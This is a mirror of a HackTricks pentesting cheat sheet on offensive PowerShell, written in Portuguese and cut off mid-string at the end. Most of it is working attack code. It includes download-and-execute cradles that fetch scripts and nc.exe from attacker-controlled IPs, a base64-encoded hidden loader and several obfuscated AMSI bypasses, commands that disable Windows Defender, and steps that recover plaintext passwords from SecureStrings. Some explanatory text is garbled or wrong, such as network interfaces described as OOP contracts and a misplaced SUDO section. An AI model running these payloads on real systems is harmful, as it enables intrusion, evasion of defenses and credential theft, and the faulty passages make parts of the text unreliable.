mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 02:53:28 +00:00
429 lines
32 KiB
Markdown
429 lines
32 KiB
Markdown
# PowerShell Básico para Pentesters
|
|
|
|
<details>
|
|
|
|
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Outras maneiras de apoiar o HackTricks:
|
|
|
|
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
|
|
|
</details>
|
|
|
|
## Localizações Padrão do PowerShell
|
|
```powershell
|
|
C:\windows\syswow64\windowspowershell\v1.0\powershell
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
|
```
|
|
## Comandos básicos do PowerShell para começar
|
|
```powershell
|
|
Get-Help * #List everything loaded
|
|
Get-Help process #List everything containing "process"
|
|
Get-Help Get-Item -Full #Get full helpabout a topic
|
|
Get-Help Get-Item -Examples #List examples
|
|
Import-Module <modulepath>
|
|
Get-Command -Module <modulename>
|
|
```
|
|
## Baixar e Executar
|
|
```powershell
|
|
g
|
|
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
|
|
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
|
|
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
|
|
|
|
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
|
|
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(
|
|
|
|
#https://twitter.com/Alh4zr3d/status/1566489367232651264
|
|
#host a text record with your payload at one of your (unburned) domains and do this:
|
|
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
|
|
```
|
|
### Baixar e Executar em segundo plano com Bypass AMSI
|
|
```powershell
|
|
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
|
|
```
|
|
### Usando b64 no Linux
|
|
```powershell
|
|
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
|
|
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
|
|
```
|
|
## Baixar
|
|
|
|
### System.Net.WebClient
|
|
```powershell
|
|
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
|
|
```
|
|
### Invoke-WebRequest
|
|
|
|
### Invocar-RequisiçãoWeb
|
|
```powershell
|
|
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
|
|
```
|
|
### Wget
|
|
|
|
### Wget
|
|
```powershell
|
|
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
|
|
```
|
|
### BitsTransfer
|
|
```powershell
|
|
Import-Module BitsTransfer
|
|
Start-BitsTransfer -Source $url -Destination $output
|
|
# OR
|
|
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
|
|
```
|
|
## Base64 Kali & EncodedCommand
|
|
|
|
## Base64 Kali & EncodedCommand
|
|
```powershell
|
|
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
|
|
PS> powershell -EncodedCommand <Base64>
|
|
```
|
|
## [Política de Execução](../authentication-credentials-uac-and-efs.md#ps-execution-policy)
|
|
|
|
## [Linguagem Confinada](broken-reference/)
|
|
|
|
## [Política do AppLocker](broken-reference/)
|
|
|
|
## Habilitar WinRM (PS Remoto)
|
|
```powershell
|
|
enable-psremoting -force #This enables winrm
|
|
|
|
# Change NetWorkConnection Category to Private
|
|
#Requires -RunasAdministrator
|
|
|
|
Get-NetConnectionProfile |
|
|
Where{ $_.NetWorkCategory -ne 'Private'} |
|
|
ForEach {
|
|
$_
|
|
$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
|
|
}
|
|
```
|
|
## Desativar o Defender
|
|
|
|
{% code overflow="wrap" %}
|
|
```powershell
|
|
# Check status
|
|
Get-MpComputerStatus
|
|
Get-MpPreference | select Exclusion* | fl #Check exclusions
|
|
# Disable
|
|
Set-MpPreference -DisableRealtimeMonitoring $true
|
|
#To completely disable Windows Defender on a computer, use the command:
|
|
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
|
|
# Set exclusion path
|
|
Set-MpPreference -ExclusionPath (pwd) -disablerealtimemonitoring
|
|
Add-MpPreference -ExclusionPath (pwd)
|
|
|
|
# Check exclusions configured via GPO
|
|
Parse-PolFile .\Registry.pol
|
|
|
|
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
|
|
ValueName : Exclusions_Paths
|
|
ValueType : REG_DWORD
|
|
ValueLength : 4
|
|
ValueData : 1
|
|
|
|
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
|
|
ValueName : C:\Windows\Temp
|
|
ValueType : REG_SZ
|
|
ValueLength : 4
|
|
ValueData : 0
|
|
```
|
|
{% endcode %}
|
|
|
|
### Bypass AMSI
|
|
|
|
O **`amsi.dll`** é **carregado** em seu processo e possui as **exportações necessárias** para que qualquer aplicativo interaja com ele. E, como ele é carregado no espaço de memória de um processo que você **controla**, você pode alterar seu comportamento **sobrescrevendo instruções na memória**. Tornando-o incapaz de detectar qualquer coisa.
|
|
|
|
Portanto, o objetivo dos bypasses do AMSI é **sobrescrever as instruções desse DLL na memória para tornar a detecção inútil**.
|
|
|
|
Página da web do **gerador de bypass do AMSI**: [**https://amsi.fail/**](https://amsi.fail/)
|
|
```powershell
|
|
# A Method
|
|
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
|
|
|
# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
|
|
$A="5492868772801748688168747280728187173688878280688776828"
|
|
$B="1173680867656877679866880867644817687416876797271"
|
|
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
|
|
substring(($_*2),2))})-replace " " ).
|
|
GetField([string](38..51|%{[char][int](29+($A+$B).
|
|
substring(($_*2),2))})-replace " ",'NonPublic,Static').
|
|
SetValue($null,$true)
|
|
|
|
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
|
|
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
|
|
|
|
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
|
|
&( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( )
|
|
|
|
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
|
|
${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s')
|
|
${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c')
|
|
${1}.SetValue($null,$true)
|
|
|
|
# Another Method
|
|
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
|
|
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
|
|
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
|
|
$field.SetValue($null,$true)
|
|
|
|
# AMSI Bypass in python
|
|
https://fluidattacks.com/blog/amsi-bypass-python/
|
|
|
|
# Testing for Amsi Bypass:
|
|
https://github.com/rasta-mouse/AmsiScanBufferBypass
|
|
|
|
# Amsi-Bypass-Powershell
|
|
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
|
|
|
|
https://blog.f-secure.com/hunting-for-amsi-bypasses/
|
|
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
|
|
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
|
|
https://slaeryan.github.io/posts/falcon-zero-alpha.html
|
|
```
|
|
### AMSI Bypass 2 - Hooking de Chamada de API Gerenciada
|
|
|
|
Verifique [**este post para informações detalhadas e o código**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Introdução:
|
|
|
|
Esta nova técnica depende do hooking de chamadas de API de métodos .NET. Acontece que os métodos .NET precisam ser compilados em instruções de máquina nativas na memória, que acabam se parecendo muito com métodos nativos. Esses métodos compilados podem ser hookados para alterar o fluxo de controle de um programa.
|
|
|
|
Os passos para realizar o hooking de chamadas de API de métodos .NET são:
|
|
|
|
1. Identificar o método alvo para hook
|
|
2. Definir um método com o mesmo protótipo de função que o alvo
|
|
3. Usar reflexão para encontrar os métodos
|
|
4. Garantir que cada método tenha sido compilado
|
|
5. Encontrar a localização de cada método na memória
|
|
6. Sobrescrever o método alvo com instruções apontando para nosso método malicioso
|
|
|
|
### AMSI Bypass 3 - Privilégio SeDebug
|
|
|
|
[**Seguindo este guia e código**](https://github.com/MzHmO/DebugAmsi) você pode ver como, com privilégios suficientes para depurar processos, você pode iniciar um processo powershell.exe, depurá-lo, monitorar quando ele carrega `amsi.dll` e desativá-lo.
|
|
|
|
### AMSI Bypass - Mais Recursos
|
|
|
|
+ [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
|
|
+ [Bypass AMSI no Windows 11 em 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi_Bypass_In_2023)
|
|
|
|
## Histórico do PS
|
|
```powershell
|
|
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
|
|
```
|
|
## Encontrar arquivos mais recentes
|
|
|
|
Opções: `CreationTime`, `CreationTimeUtc`, `LastAccessTime`, `LastAccessTimeUtc`, `LastWriteTime`, `LastWriteTimeUtc`
|
|
```powershell
|
|
# LastAccessTime:
|
|
(gci C:\ -r | sort -Descending LastAccessTime | select -first 100) | Select-Object -Property LastAccessTime,FullName
|
|
|
|
# LastWriteTime:
|
|
(gci C:\ -r | sort -Descending LastWriteTime | select -first 100) | Select-Object -Property LastWriteTime,FullName
|
|
```
|
|
## Obter permissões
|
|
```powershell
|
|
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
|
|
```
|
|
## Versão do sistema operacional e HotFixes
|
|
```powershell
|
|
[System.Environment]::OSVersion.Version #Current OS version
|
|
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
|
|
Get-Hotfix -description "Security update" #List only "Security Update" patches
|
|
```
|
|
## Ambiente
|
|
```powershell
|
|
Get-ChildItem Env: | ft Key,Value #get all values
|
|
$env:UserName @Get UserName value
|
|
```
|
|
## Outras unidades conectadas
|
|
```powershell
|
|
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
|
|
```
|
|
### Lixeira
|
|
```powershell
|
|
$shell = New-Object -com shell.application
|
|
$rb = $shell.Namespace(10)
|
|
$rb.Items()
|
|
```
|
|
[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/)
|
|
|
|
## Reconhecimento de Domínio
|
|
|
|
{% content-ref url="powerview.md" %}
|
|
[powerview.md](powerview.md)
|
|
{% endcontent-ref %}
|
|
|
|
## Usuários
|
|
```powershell
|
|
Get-LocalUser | ft Name,Enabled,Description,LastLogon
|
|
Get-ChildItem C:\Users -Force | select Name
|
|
```
|
|
## String Segura para Texto Simples
|
|
```powershell
|
|
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
|
|
$user = "HTB\Tom"
|
|
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
|
|
$cred.GetNetworkCredential() | fl
|
|
|
|
UserName : Tom
|
|
Password : 1ts-mag1c!!!
|
|
SecurePassword : System.Security.SecureString
|
|
Domain : HTB
|
|
```
|
|
Ou analisando diretamente a partir do XML:
|
|
```powershell
|
|
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
|
|
|
|
UserName : Tom
|
|
Password : 1ts-mag1c!!!
|
|
SecurePassword : System.Security.SecureString
|
|
Domain : HTB
|
|
```
|
|
## SUDO
|
|
|
|
SUDO stands for "Super User Do" and it allows users to execute commands with the security privileges of another user, typically the superuser or root.
|
|
```powershell
|
|
#CREATE A CREDENTIAL OBJECT
|
|
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
|
|
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
|
|
|
|
#For local:
|
|
Start-Process -Credential ($cred) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"
|
|
|
|
#For WINRM
|
|
#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
|
|
Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
|
|
#DOWNLOAD nc.exe
|
|
Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred
|
|
|
|
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'
|
|
|
|
#Another method
|
|
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
|
|
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
|
|
$computer = "<hostname>"
|
|
```
|
|
## Grupos
|
|
```powershell
|
|
Get-LocalGroup | ft Name #All groups
|
|
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
|
|
```
|
|
## Área de Transferência
|
|
```powershell
|
|
Get-Clipboard
|
|
```
|
|
## Processos
|
|
```powershell
|
|
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
|
|
```
|
|
## Serviços
|
|
```
|
|
Get-Service
|
|
```
|
|
## Senha a partir de uma string segura
|
|
```powershell
|
|
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
|
|
$cred=new-object system.management.automation.pscredential("administrator", $pw)
|
|
$cred.getnetworkcredential() | fl * #Get plaintext password
|
|
```
|
|
## Tarefas Agendadas
|
|
```powershell
|
|
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
|
```
|
|
## Rede
|
|
|
|
### Varredura de Portas
|
|
```powershell
|
|
# Check Port or Single IP
|
|
Test-NetConnection -Port 80 10.10.10.10
|
|
|
|
# Check Port List in Single IP
|
|
80,443,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null
|
|
|
|
# Check Port Range in single IP
|
|
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10", $_)) "TCP port $_ is open"} 2>$null
|
|
|
|
# Check Port List in IP Lists - 80,443,445,8080
|
|
"10.10.10.10","10.10.10.11" | % { $a = $_; write-host "[INFO] Testing $_ ..."; 80,443,445,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("$a",$_)) "$a : $_ is open!"} 2>$null}
|
|
|
|
```
|
|
### Interfaces
|
|
|
|
Interfaces são uma parte crucial da programação orientada a objetos em PowerShell. Elas definem um contrato que as classes devem seguir, especificando quais métodos e propriedades devem ser implementados. Isso ajuda a garantir consistência e padronização no código.
|
|
```powershell
|
|
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
|
|
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
|
|
```
|
|
### Firewall
|
|
```powershell
|
|
Get-NetFirewallRule -Enabled True
|
|
|
|
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
|
|
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
|
|
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Block
|
|
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow
|
|
|
|
# Open SSH to the world
|
|
New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 22 -Protocol TCP -Action Allow
|
|
|
|
# Get name, proto, local and rremote ports, remote address, penable,profile and direction
|
|
## You can user the following line changing the initial filters to indicat a difefrent direction or action
|
|
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action
|
|
```
|
|
### Rota
|
|
```powershell
|
|
route print
|
|
```
|
|
### ARP
|
|
```powershell
|
|
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
|
|
```
|
|
### Hospedeiros
|
|
```powershell
|
|
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
|
|
```
|
|
### Ping
|
|
|
|
### Ping
|
|
```powershell
|
|
$ping = New-Object System.Net.Networkinformation.Ping
|
|
1..254 | % { $ping.send("10.9.15.$_") | select address, status }
|
|
```
|
|
### SNMP
|
|
```powershell
|
|
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
|
```
|
|
## **Convertendo a String SDDL em um Formato Legível**
|
|
```powershell
|
|
PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-